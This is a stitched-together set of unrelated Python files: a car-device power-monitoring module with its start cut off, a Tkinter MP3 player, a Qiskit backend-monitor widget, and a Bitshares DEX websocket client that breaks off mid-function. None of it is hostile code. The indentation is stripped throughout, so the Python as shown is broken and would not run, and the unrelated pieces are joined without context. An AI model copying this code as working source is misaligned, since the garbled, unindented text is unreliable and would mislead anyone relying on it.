CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
# A C2 uses about 1W while idling, and 30h seens like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0
MAX_TIME_OFFROAD_S = 864000 # time in seconds
class PowerMonitoring:
def __init__(self):
self.params = Params()
self.last_measurement_time = None # Used for integration delta
self.last_save_time = 0 # Used for saving current value in a param
self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad
self.next_pulsed_measurement_time = None
self.car_voltage_mV = 12e3 # Low-passed version of pandaState voltage
self.integration_lock = threading.Lock()
car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
if car_battery_capacity_uWh is None:
car_battery_capacity_uWh = 0
# Reset capacity if it's low
self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
# Calculation tick
def calculate(self, pandaState):
try:
now = sec_since_boot()
# If pandaState is None, we're probably not in a car, so we don't care
if pandaState is None or pandaState.pandaState.pandaType == log.PandaState.PandaType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_mV = ((pandaState.pandaState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if (pandaState.pandaState.ignitionLine or pandaState.pandaState.ignitionCan):
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = pandaState.pandaState.pandaType == log.PandaState.PandaType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power is not None:
pass
elif HARDWARE.get_battery_status() == 'Discharging':
# If the battery is discharging, we can use this measurement
# On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t, current_power):
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self):
return int(self.power_used_uWh)
def get_car_battery_capacity(self):
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, pandaState, offroad_timestamp):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= (not pandaState.pandaState.ignitionLine and not pandaState.pandaState.ignitionCan)
disable_charging &= (self.params.get("DisablePowerDown") != b"1")
disable_charging |= (self.params.get("ForcePowerDown") == b"1")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, pandaState, offroad_timestamp, started_seen):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
panda_charging = (pandaState.pandaState.usbPowerMode != log.PandaState.UsbPowerMode.client)
BATT_PERC_OFF = 10
should_shutdown = False
# Wait until we have shut down charging before powering down
should_shutdown |= (not panda_charging and self.should_disable_charging(pandaState, offroad_timestamp))
should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and ((now - offroad_timestamp) > 60))
should_shutdown &= started_seen
return should_shutdown
|
Mp3 Player.py
|
import os
import threading
import time
import tkinter.messagebox
from tkinter import *
from tkinter import filedialog
from tkinter import ttk
from ttkthemes import themed_tk as tk
from mutagen.mp3 import MP3
from pygame import mixer
root = tk.ThemedTk()
root.get_themes() # Returns a list of all themes that can be set
root.set_theme("radiance") # Sets an available theme
# Fonts - Arial (corresponds to Helvetica), Courier New (Courier), Comic Sans MS, Fixedsys,
# MS Sans Serif, MS Serif, Symbol, System, Times New Roman (Times), and Verdana
#
# Styles - normal, bold, roman, italic, underline, and overstrike.
statusbar = ttk.Label(root, text="Welcome to Melody", relief=SUNKEN, anchor=W, font='Times 10 italic')
statusbar.pack(side=BOTTOM, fill=X)
# Create the menubar
menubar = Menu(root)
root.config(menu=menubar)
# Create the submenu
subMenu = Menu(menubar, tearoff=0)
playlist = []
# playlist - contains the full path + filename
# playlistbox - contains just the filename
# Fullpath + filename is required to play the music inside play_music load function
def browse_file():
global filename_path
filename_path = filedialog.askopenfilename()
add_to_playlist(filename_path)
mixer.music.queue(filename_path)
def add_to_playlist(filename):
filename = os.path.basename(filename)
index = 0
playlistbox.insert(index, filename)
playlist.insert(index, filename_path)
index += 1
menubar.add_cascade(label="File", menu=subMenu)
subMenu.add_command(label="Open", command=browse_file)
subMenu.add_command(label="Exit", command=root.destroy)
def about_us():
tkinter.messagebox.showinfo('About Melody', 'This is a music player build using Python Tkinter by Harish')
subMenu = Menu(menubar, tearoff=0)
menubar.add_cascade(label="Help", menu=subMenu)
subMenu.add_command(label="About Us", command=about_us)
mixer.init() # initializing the mixer
root.title("Melody")
root.iconbitmap(r'images/melody.ico')
# Root Window - StatusBar, LeftFrame, RightFrame
# LeftFrame - The listbox (playlist)
# RightFrame - TopFrame,MiddleFrame and the BottomFrame
leftframe = Frame(root)
leftframe.pack(side=LEFT, padx=30, pady=30)
playlistbox = Listbox(leftframe)
playlistbox.pack()
addBtn = ttk.Button(leftframe, text="+ Add", command=browse_file)
addBtn.pack(side=LEFT)
def del_song():
selected_song = playlistbox.curselection()
selected_song = int(selected_song[0])
playlistbox.delete(selected_song)
playlist.pop(selected_song)
delBtn = ttk.Button(leftframe, text="- Del", command=del_song)
delBtn.pack(side=LEFT)
rightframe = Frame(root)
rightframe.pack(pady=30)
topframe = Frame(rightframe)
topframe.pack()
lengthlabel = ttk.Label(topframe, text='Total Length : --:--')
lengthlabel.pack(pady=5)
currenttimelabel = ttk.Label(topframe, text='Current Time : --:--', relief=GROOVE)
currenttimelabel.pack()
def show_details(play_song):
file_data = os.path.splitext(play_song)
if file_data[1] == '.mp3':
audio = MP3(play_song)
total_length = audio.info.length
else:
a = mixer.Sound(play_song)
total_length = a.get_length()
# div - total_length/60, mod - total_length % 60
mins, secs = divmod(total_length, 60)
mins = round(mins)
secs = round(secs)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
lengthlabel['text'] = "Total Length" + ' - ' + timeformat
t1 = threading.Thread(target=start_count, args=(total_length,))
t1.start()
def start_count(t):
global paused
# mixer.music.get_busy(): - Returns FALSE when we press the stop button (music stop playing)
# Continue - Ignores all of the statements below it. We check if music is paused or not.
current_time = 0
while current_time <= t and mixer.music.get_busy():
if paused:
continue
else:
mins, secs = divmod(current_time, 60)
mins = round(mins)
secs = round(secs)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
currenttimelabel['text'] = "Current Time" + ' - ' + timeformat
time.sleep(1)
current_time += 1
def play_music():
global paused
if paused:
mixer.music.unpause()
statusbar['text'] = "Music Resumed"
paused = FALSE
else:
try:
stop_music()
time.sleep(1)
selected_song = playlistbox.curselection()
selected_song = int(selected_song[0])
play_it = playlist[selected_song]
mixer.music.load(play_it)
mixer.music.play()
statusbar['text'] = "Playing music" + ' - ' + os.path.basename(play_it)
show_details(play_it)
except:
tkinter.messagebox.showerror('File not found', 'Melody could not find the file. Please check again.')
def stop_music():
mixer.music.stop()
statusbar['text'] = "Music Stopped"
paused = FALSE
def pause_music():
global paused
paused = TRUE
mixer.music.pause()
statusbar['text'] = "Music Paused"
def rewind_music():
play_music()
statusbar['text'] = "Music Rewinded"
def set_vol(val):
volume = float(val) / 100
mixer.music.set_volume(volume)
# set_volume of mixer takes value only from 0 to 1. Example - 0, 0.1,0.55,0.54.0.99,1
muted = FALSE
def mute_music():
global muted
if muted: # Unmute the music
mixer.music.set_volume(0.7)
volumeBtn.configure(image=volumePhoto)
scale.set(70)
muted = FALSE
else: # mute the music
mixer.music.set_volume(0)
volumeBtn.configure(image=mutePhoto)
scale.set(0)
muted = TRUE
middleframe = Frame(rightframe)
middleframe.pack(pady=30, padx=30)
playPhoto = PhotoImage(file='images/play.png')
playBtn = ttk.Button(middleframe, image=playPhoto, command=play_music)
playBtn.grid(row=0, column=0, padx=10)
stopPhoto = PhotoImage(file='images/stop.png')
stopBtn = ttk.Button(middleframe, image=stopPhoto, command=stop_music)
stopBtn.grid(row=0, column=1, padx=10)
pausePhoto = PhotoImage(file='images/pause.png')
pauseBtn = ttk.Button(middleframe, image=pausePhoto, command=pause_music)
pauseBtn.grid(row=0, column=2, padx=10)
# Bottom Frame for volume, rewind, mute etc.
bottomframe = Frame(rightframe)
bottomframe.pack()
rewindPhoto = PhotoImage(file='images/rewind.png')
rewindBtn = ttk.Button(bottomframe, image=rewindPhoto, command=rewind_music)
rewindBtn.grid(row=0, column=0)
mutePhoto = PhotoImage(file='images/mute.png')
volumePhoto = PhotoImage(file='images/volume.png')
volumeBtn = ttk.Button(bottomframe, image=volumePhoto, command=mute_music)
volumeBtn.grid(row=0, column=1)
scale = ttk.Scale(bottomframe, from_=0, to=100, orient=HORIZONTAL, command=set_vol)
scale.set(70) # implement the default value of scale when music player starts
mixer.music.set_volume(0.7)
scale.grid(row=0, column=2, pady=15, padx=30)
def on_closing():
stop_music()
root.destroy()
root.protocol("WM_DELETE_WINDOW", on_closing)
root.mainloop()
|
_backend_overview.py
|
# -*- coding: utf-8 -*-
# Copyright 2018, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
"""A module for monitoring backends."""
import time
import threading
import types
from IPython.display import display # pylint: disable=import-error
from IPython.core.magic import line_magic, Magics, magics_class # pylint: disable=import-error
from IPython.core import magic_arguments # pylint: disable=import-error
import ipywidgets as widgets # pylint: disable=import-error
import matplotlib.pyplot as plt # pylint: disable=import-error
from qiskit.tools.monitor.backend_overview import get_unique_backends
from qiskit.tools.visualization._gate_map import plot_gate_map
@magics_class
class BackendOverview(Magics):
"""A class of status magic functions.
"""
@line_magic
@magic_arguments.magic_arguments()
@magic_arguments.argument(
'-i',
'--interval',
type=float,
default=60,
help='Interval for status check.'
)
def qiskit_backend_overview(self, line='', cell=None): # pylint: disable=W0613
"""A Jupyter magic function to monitor backends.
"""
args = magic_arguments.parse_argstring(
self.qiskit_backend_overview, line)
unique_hardware_backends = get_unique_backends()
_value = "<h2 style ='color:#ffffff; background-color:#000000;"
_value += "padding-top: 1%; padding-bottom: 1%;padding-left: 1%;"
_value += "margin-top: 0px'>Backend Overview</h2>"
backend_title = widgets.HTML(value=_value,
layout=widgets.Layout(margin='0px 0px 0px 0px'))
build_back_widgets = [backend_widget(b)
for b in unique_hardware_backends]
_backends = []
# Sort backends by operational or not
oper_ord_backends = []
for n, back in enumerate(unique_hardware_backends):
if back.status().operational:
oper_ord_backends = [build_back_widgets[n]] + oper_ord_backends
_backends = [back] + _backends
else:
oper_ord_backends = oper_ord_backends + [build_back_widgets[n]]
_backends = _backends + [back]
qubit_label = widgets.Label(value='Num. Qubits')
pend_label = widgets.Label(value='Pending Jobs')
least_label = widgets.Label(value='Least Busy')
oper_label = widgets.Label(
value='Operational', layout=widgets.Layout(margin='5px 0px 0px 0px'))
t1_label = widgets.Label(
value='Avg. T1', layout=widgets.Layout(margin='10px 0px 0px 0px'))
t2_label = widgets.Label(
value='Avg. T2', layout=widgets.Layout(margin='10px 0px 0px 0px'))
labels_widget = widgets.VBox([qubit_label, pend_label, least_label,
oper_label, t1_label, t2_label],
layout=widgets.Layout(margin='295px 0px 0px 0px',
min_width='100px'))
backend_grid = GridBox_with_thread(children=oper_ord_backends,
layout=widgets.Layout(
grid_template_columns='250px ' *
len(unique_hardware_backends),
grid_template_rows='auto',
grid_gap='0px 25px'))
backend_grid._backends = _backends # pylint: disable=W0201
backend_grid._update = types.MethodType( # pylint: disable=W0201
update_backend_info, backend_grid)
backend_grid._thread = threading.Thread( # pylint: disable=W0201
target=backend_grid._update, args=(args.interval,))
backend_grid._thread.start()
back_box = widgets.HBox([labels_widget, backend_grid])
back_monitor = widgets.VBox([backend_title, back_box])
display(back_monitor)
class GridBox_with_thread(widgets.GridBox): # pylint: disable=invalid-name
"""A GridBox that will close an attached thread
"""
def __del__(self):
"""Object disposal"""
if hasattr(self, '_thread'):
try:
self._thread.do_run = False
self._thread.join()
except Exception: # pylint: disable=W0703
pass
self.close()
def backend_widget(backend):
"""Creates a backend widget.
"""
config = backend.configuration().to_dict()
props = backend.properties().to_dict()
name = widgets.HTML(value="<h4>{name}</h4>".format(name=backend.name()),
layout=widgets.Layout())
n_qubits = config['n_qubits']
qubit_count = widgets.HTML(value="<h5><b>{qubits}</b></h5>".format(qubits=n_qubits),
layout=widgets.Layout(justify_content='center'))
cmap = widgets.Output(layout=widgets.Layout(min_width='250px', max_width='250px',
max_height='250px',
min_height='250px',
justify_content='center',
align_items='center',
margin='0px 0px 0px 0px'))
with cmap:
_cmap_fig = plot_gate_map(backend,
plot_directed=False,
label_qubits=False)
if _cmap_fig is not None:
display(_cmap_fig)
# Prevents plot from showing up twice.
plt.close(_cmap_fig)
pending = generate_jobs_pending_widget()
is_oper = widgets.HTML(value="<h5></h5>",
layout=widgets.Layout(justify_content='center'))
least_busy = widgets.HTML(value="<h5></h5>",
layout=widgets.Layout(justify_content='center'))
t1_units = props['qubits'][0][0]['unit']
avg_t1 = round(sum([q[0]['value'] for q in props['qubits']])/n_qubits, 1)
t1_widget = widgets.HTML(value="<h5>{t1} {units}</h5>".format(t1=avg_t1, units=t1_units),
layout=widgets.Layout())
t2_units = props['qubits'][0][1]['unit']
avg_t2 = round(sum([q[1]['value'] for q in props['qubits']])/n_qubits, 1)
t2_widget = widgets.HTML(value="<h5>{t2} {units}</h5>".format(t2=avg_t2, units=t2_units),
layout=widgets.Layout())
out = widgets.VBox([name, cmap, qubit_count, pending,
least_busy, is_oper, t1_widget, t2_widget],
layout=widgets.Layout(display='inline-flex',
flex_flow='column',
align_items='center'))
out._is_alive = True
return out
def update_backend_info(self, interval=60):
"""Updates the monitor info
Called from another thread.
"""
my_thread = threading.currentThread()
current_interval = 0
started = False
all_dead = False
stati = [None]*len(self._backends)
while getattr(my_thread, "do_run", True) and not all_dead:
if current_interval == interval or started is False:
for ind, back in enumerate(self._backends):
_value = self.children[ind].children[2].value
_head = _value.split('<b>')[0]
try:
_status = back.status()
stati[ind] = _status
except Exception: # pylint: disable=W0703
self.children[ind].children[2].value = _value.replace(
_head, "<h5 style='color:#ff5c49'>")
self.children[ind]._is_alive = False
else:
self.children[ind]._is_alive = True
self.children[ind].children[2].value = _value.replace(
_head, "<h5>")
idx = list(range(len(self._backends)))
pending = [s.pending_jobs for s in stati]
_, least_idx = zip(*sorted(zip(pending, idx)))
# Make sure least pending is operational
for ind in least_idx:
if stati[ind].operational:
least_pending_idx = ind
break
for var in idx:
if var == least_pending_idx:
self.children[var].children[4].value = "<h5 style='color:#34bc6e'>True</h5>"
else:
self.children[var].children[4].value = "<h5 style='color:#dc267f'>False</h5>"
self.children[var].children[3].children[1].value = pending[var]
self.children[var].children[3].children[1].max = max(
self.children[var].children[3].children[1].max, pending[var]+10)
if stati[var].operational:
self.children[var].children[5].value = "<h5 style='color:#34bc6e'>True</h5>"
else:
self.children[var].children[5].value = "<h5 style='color:#dc267f'>False</h5>"
started = True
current_interval = 0
time.sleep(1)
all_dead = not any([wid._is_alive for wid in self.children])
current_interval += 1
def generate_jobs_pending_widget():
"""Generates a jobs_pending progress bar widget.
"""
pbar = widgets.IntProgress(
value=0,
min=0,
max=50,
description='',
orientation='horizontal', layout=widgets.Layout(max_width='180px'))
pbar.style.bar_color = '#71cddd'
pbar_current = widgets.Label(
value=str(pbar.value), layout=widgets.Layout(min_width='auto'))
pbar_max = widgets.Label(
value=str(pbar.max), layout=widgets.Layout(min_width='auto'))
def _on_max_change(change):
pbar_max.value = str(change['new'])
def _on_val_change(change):
pbar_current.value = str(change['new'])
pbar.observe(_on_max_change, names='max')
pbar.observe(_on_val_change, names='value')
jobs_widget = widgets.HBox([pbar_current, pbar, pbar_max],
layout=widgets.Layout(max_width='250px',
min_width='250px',
justify_content='center'))
return jobs_widget
|
metaNODE11.py
|
' litepresence 2018 '
def WTFPL_v0_March_1765():
if any([stamps, licenses, taxation, regulation, fiat, etat]):
try:
print('no thank you')
except:
return [tar, feathers]
from random import random, shuffle, randint, choice
from ast import literal_eval as literal
from multiprocessing import Process
from datetime import datetime
from statistics import mode
import traceback
import numpy
import time
import json
import sys
import os
try:
import websocket
websocket.enableTrace(True)
except:
raise ValueError('pip install websocket-client')
def banner():
print("\033c")
if 1:
print(
'''
Do this:
metaNODE = Bitshares_Trustless_Client()
''')
time.sleep(4)
print("\033c")
print(
'''
Get these curated Bitshares DEX feeds:
''')
time.sleep(0.5)
print(" metaNODE['last'] #" +
" float; latest price \n")
time.sleep(0.5)
print(" metaNODE['bids'] #" +
" list of (price,amount) tuples; [0][0]=highest bid price \n")
time.sleep(0.5)
print(" metaNODE['asks'] #" +
" list of (price,amount) tuples; [0][0]=lowest ask price \n")
time.sleep(0.5)
print(" metaNODE['history'] #" +
" list of (unix,price,amount) tuples; [0][0]=last trade time \n")
time.sleep(0.5)
print(" metaNODE['currency'] #" +
" float; quantity of currency \n")
time.sleep(0.5)
print(" metaNODE['assets'] #" +
" float; quantity of assets \n")
print(" metaNODE['orders'] #" +
" list of dicts of human readable orders \n")
time.sleep(0.5)
print(" metaNODE['whitelist'] #" +
" list; [0]=most recently whitelisted node \n")
time.sleep(0.5)
print(" metaNODE['blacklist'] #" +
" list; [0]=most recently blacklisted node \n")
time.sleep(0.5)
print(" metaNODE['blocktime'] #" +
" oldest blockchain time in metaNODE data \n\n\n\n")
time.sleep(1)
print("to watch data feed, in second terminal type:")
print('')
print('>>> tail -f metaNODE.txt')
print('')
print("to watch error report, in third terminal type:")
print('')
print('>>> tail -f metaNODElog.txt')
print('')
time.sleep(2)
# GLOBALS
# ======================================================================
def controls():
global WHITE, BLACK, TIMEOUT, PROCESSES, MAVENS
global BOOK_DEPTH, HISTORY_DEPTH, PAUSE, BLIP
#As Tested
WHITE = 20 #20
BLACK = 30 #30
TIMEOUT = 300 #300
PROCESSES = 20 #20
MAVENS = 7 #7
BOOK_DEPTH = 10 #10
HISTORY_DEPTH = 50 #50
PAUSE = 4 #2
BLIP = 0.05 #0.05
def public_nodes():
global nodes, node_count
nodes = ['wss://ap-northeast-1.bts.crypto-bridge.org/wss',
'wss://ap-northeast-2.bts.crypto-bridge.org/wss',
'wss://ap-southeast-1.bts.crypto-bridge.org/wss',
'wss://ap-southeast-2.bts.crypto-bridge.org/wss',
'wss://api-ru.bts.blckchnd.com/wss',
'wss://api.bitshares.bhuz.info/ws',
'wss://api.bitsharesdex.com',
'wss://api.bts.ai/',
'wss://api.bts.blckchnd.com/wss',
'wss://api.bts.mobi/wss',
'wss://api.bts.network',
'wss://api.btsgo.net/ws',
'wss://api.btsxchng.com',
'wss://atlanta.bitshares.apasia.tech/ws',
'wss://australia.bitshares.apasia.tech/ws',
'wss://b.mrx.im/wss',
'wss://bit.btsabc.org/ws',
'wss://bitshares-api.wancloud.io/ws',
'wss://bitshares.apasia.tech/ws',
'wss://bitshares.bts123.cc:15138/',
'wss://bitshares.crypto.fans/ws',
'wss://bitshares.cyberit.io/',
'wss://bitshares.dacplay.org/wss',
'wss://bitshares.dacplay.org:8089/wss',
'wss://bitshares.neocrypto.io/wss',
'wss://bitshares.nu/ws',
'wss://bitshares.openledger.info/ws',
'wss://blockzms.xyz/ws',
'wss://bts-api.lafona.net/ws',
'wss://bts-seoul.clockwork.gr',
'wss://bts.ai.la/wss',
'wss://bts.proxyhosts.info/wss',
'wss://bts.open.icowallet.net/ws',
'wss://bts.to0l.cn:4443/ws',
'wss://bts.transwiser.com/wss',
'wss://btsws.roelandp.nl/ws',
'wss://btsza.co.za:8091/ws',
'wss://canada6.daostreet.com/ws',
'wss://capetown.bitshares.africa/ws',
'wss://chicago.bitshares.apasia.tech/ws',
'wss://crazybit.online',
'wss://croatia.bitshares.apasia.tech/ws',
'wss://dallas.bitshares.apasia.tech/ws',
'wss://dele-puppy.com/wss',
'wss://dex.rnglab.org/wss',
'wss://dexnode.net/wss',
'wss://england.bitshares.apasia.tech/ws',
'wss://eu-central-1.bts.crypto-bridge.org/wss',
'wss://eu-west-1.bts.crypto-bridge.org/wss',
'wss://eu.nodes.bitshares.ws/wss',
'wss://eu.openledger.info/ws',
'wss://france.bitshares.apasia.tech/ws',
'wss://frankfurt8.daostreet.com/ws',
'wss://freedom.bts123.cc:15138/',
'wss://japan.bitshares.apasia.tech/ws',
'wss://kc-us-dex.xeldal.com/wss',
'wss://kimziv.com/ws',
'wss://la.dexnode.net/wss',
'wss://miami.bitshares.apasia.tech/ws',
'wss://ncali5.daostreet.com/ws',
'wss://new-york.bitshares.apasia.tech/ws',
'wss://node.bitshares.eu/wss',
'wss://node.btscharts.com/ws',
'wss://node.market.rudex.org/wss',
'wss://nohistory.proxyhosts.info/wss',
'wss://ohio4.daostreet.com/ws',
'wss://openledger.hk/ws',
'wss://oregon2.daostreet.com/ws',
'wss://paris7.daostreet.com/ws',
'wss://relinked.com/ws',
'wss://sa-east-1.bts.crypto-bridge.org/wss',
'wss://scali10.daostreet.com/ws',
'wss://seattle.bitshares.apasia.tech/ws',
'wss://seoul9.daostreet.com/ws',
'wss://sg.nodes.bitshares.ws/wss',
'wss://singapore.bitshares.apasia.tech/ws',
'wss://slovenia.bitshares.apasia.tech/wss',
'wss://this.uptick.rocks/ws',
'wss://us-east-1.bts.crypto-bridge.org/wss',
'wss://us-la.bitshares.apasia.tech/ws',
'wss://us-ny.bitshares.apasia.tech/wss',
'wss://us-west-1.bts.crypto-bridge.org/wss',
'wss://us.nodes.bitshares.ws/wss',
'wss://valen-tin.fr:8090/wss',
'wss://valley.bitshares.apasia.tech/ws',
'wss://virginia3.daostreet.com/ws',
'wss://ws.gdex.io',
'wss://ws.gdex.top/wss',
'wss://ws.hellobts.com/',
'wss://ws.winex.pro/wss',
'wss://za.bitshares.africa/ws', ]
node_count = len(nodes)
def constants():
global Z, TZ, MAINNET, BEGIN
TZ = time.altzone
MAINNET = ('4018d7844c78f6a6c41c6a552b89802' +
'2310fc5dec06da467ee7905a8dad512c8')
Z = '{"id":1,"method":"call","params":["database",'
BEGIN = int(time.time())
def sign_in():
global account_name, currency, asset
print('''
(BTS) litepresence1
Resistance and Disobedience in Economic Activity
is the Most Moral Human Action Possible
-SEK3''')
print('')
print('Input Account and Market, or press Enter for demo')
print('')
account_name = input('account name: ').strip('"').strip("'")
print('')
currency = input(' currency: ').strip('"').strip("'").upper()
print('')
asset = input(' asset: ').strip('"').strip("'").upper()
print('')
if account_name == '':
account_name = 'abc123'
if currency == '':
currency = 'GDEX.BTC'
if asset == '':
asset = 'BTS'
def initialize():
now = int(time.time())
race_write(doc='blacklist.txt', text=[])
race_write(doc='whitelist.txt', text=[])
race_write(doc='metaNODElog.txt', text='')
race_write(doc='metaNODE.txt', text={})
race_write(doc='mavens.txt', text=[])
race_write(doc='watchdog.txt', text=[now, now])
# TEXT PIPE
# ======================================================================
def Bitshares_Trustless_Client(): # Your access to the metaNODE
# Include this definition in your script to access metaNODE.txt
# Deploy your bot script in the same folder as metaNODE.py
'from ast import literal_eval as literal'
i = 0
while True:
time.sleep(0.05 * i ** 2)
i += 1
try:
with open('metaNODE.txt', 'r') as f:
ret = f.read()
f.close()
metaNODE = literal(ret)
break
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print(msg)
try:
f.close()
except:
pass
finally:
try:
f.close()
except:
pass
return metaNODE
def race_read(doc=''): # Concurrent Read from File Operation
i = 0
while True:
time.sleep(BLIP * i ** 2)
i += 1
try:
with open(doc, 'r') as f:
ret = f.read()
f.close()
try:
ret = literal(ret)
except:
try:
ret = ret.split(']')[0] + ']'
ret = literal(ret)
except:
try:
ret = ret.split('}')[0] + '}'
ret = literal(ret)
except:
if '{' in ret:
ret = {}
else:
ret = []
break
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print(msg)
try:
f.close()
except:
pass
finally:
try:
f.close()
except:
pass
return ret
def race_write(doc='', text=''): # Concurrent Write to File Operation
text = str(text)
i = 0
while True:
time.sleep(BLIP * i ** 2)
i += 1
try:
with open(doc, 'w+') as f:
f.write(text)
f.close()
break
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print(msg)
try:
f.close()
except:
pass
finally:
try:
f.close()
except:
pass
def race_append(doc='', text=''): # Concurrent Append to File Operation
text = '\n' + str(time.ctime()) + ' ' + str(text) + '\n'
i = 0
while True:
time.sleep(BLIP * i ** 2)
i += 1
try:
if i > 10:
break
with open(doc, 'a+') as f:
f.write(text)
f.close()
break
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print(msg)
try:
f.close()
except:
pass
finally:
try:
f.close()
except:
pass
def watchdog():
identity = 1 # metaNODE:1, botscript:0
max_latency = 600
while 1:
try:
try:
with open('watchdog.txt', 'r') as f:
ret = f.read()
f.close()
ret = literal(ret)
response = int(ret[identity])
now = int(time.time())
latency = now-response
if identity == 0:
msg = str([response, now])
if identity == 1:
msg = str([now, response])
with open('watchdog.txt', 'w+') as f:
f.write(msg)
f.close()
msg = str(latency)
if latency > max_latency:
bell()
gmail()
msg += ' !!!!! WARNING: the other app is not responding !!!!!'
return msg
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print(msg)
now = int(time.time())
with open('watchdog.txt', 'w+') as f:
f.write(str([now, now]))
f.close()
break # exit while loop
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print(msg)
try:
f.close()
except:
pass
finally:
try:
f.close()
except:
pass
# CURATION
# ======================================================================
def inquire(call): # single use public node database api call
while True:
try:
black = race_read(doc='blacklist.txt')
white = race_read(doc='whitelist.txt')
# switch nodes
shuffle(nodes)
node = nodes[0]
print(node)
if node in black:
raise ValueError('blacklisted')
if node in white:
raise ValueError('whitelisted')
call = call.replace("'", '"') # never use single quotes
ws = websocket.create_connection(node, timeout=6)
ws.send(call)
ret = json.loads(ws.recv())['result']
ws.close()
winnow('whitelist', node)
return ret
except Exception as e:
msg = str(type(e).__name__) + str(e.args) + node
print(msg)
race_append(doc='metaNODElog.txt', text=msg)
winnow('blacklist', node)
pass
def cache(): # acquire asset id and asset amount decimal place
# given account name, currency and asset symbols, lookup these globals
global account_id, asset_id, currency_id
global asset_precision, currency_precision
lookup_accounts = Z + \
'"lookup_accounts",["%s", "%s"]]}' % (account_name, 1)
lookup_asset_symbols = Z + \
'"lookup_asset_symbols",[["%s", "%s"]]]}' % (asset, currency)
account_ids, asset_ids, currency_ids = [], [], []
asset_precisions, currency_precisions = [], []
def wwc():
print("\033c")
logo()
print('')
print(time.ctime())
print('')
print('Winnowing Websocket Connections...')
print('==================================')
print('')
# trustless of multiple nodes
for i in range(3):
wwc()
account_id = (inquire(lookup_accounts))[0][1]
wwc()
ret = inquire(lookup_asset_symbols)
asset_id = ret[0]['id']
asset_precision = ret[0]['precision']
currency_id = ret[1]['id']
currency_precision = ret[1]['precision']
account_ids.append(account_id)
asset_ids.append(asset_id)
currency_ids.append(currency_id)
asset_precisions.append(asset_precision)
currency_precisions.append(currency_precision)
account_id = mode(account_ids)
asset_id = mode(asset_ids)
